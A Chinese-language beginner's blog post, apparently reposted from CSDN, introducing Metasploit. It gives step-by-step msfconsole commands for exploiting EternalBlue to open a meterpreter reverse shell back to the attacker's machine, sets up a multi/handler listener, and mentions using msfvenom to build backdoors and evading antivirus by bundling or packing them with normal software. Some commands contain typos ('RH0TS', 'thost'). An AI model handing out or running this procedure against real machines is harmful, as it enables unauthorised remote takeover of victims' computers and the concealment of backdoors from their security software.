本文介绍: 业余学习
secure
ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。
一、基本工具
1、metasploit framework
msf
(metasploit framework)是一个开源的渗透测试框架,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具、漏洞利用模块和负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。
msf使用法则:使用模块->配置模块必选项->运行模块
msfconsole //进入msf控制台,以使用模块(推荐root权限)
>>>进入msf
//1、使用模块
search 关键词 //搜索模块
use 模块编号/绝对路径 //使用模块
>>>进入模块
//2、配置模块必选项
show options //显示配置选项
set 选项名称 值
//3、运行模块
run
举例:metasploit攻击永恒之蓝(后门)
1、有此漏洞的目标主机
//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128 //[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp //[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345 //[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help //从帮助里看看能对目标主机干什么
2、无此漏洞的目标主机(常用)
没有漏洞就得拍个间谍过去,把后门打开。
2.1 目标主机的间谍软件:msfvenom
是用来生成后门的软件,在目标机上执行后门,在本地监听上线,更容易策反meterpreter,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]
避开杀毒软件
方法一:和正常软件捆绑
方法二:给辅助软件加壳
自行寻找
2.2 本地主机的接应程序:
use exploit/multi/handler //攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run
原文地址:https://blog.csdn.net/qq_41753052/article/details/135720236
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_59656.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。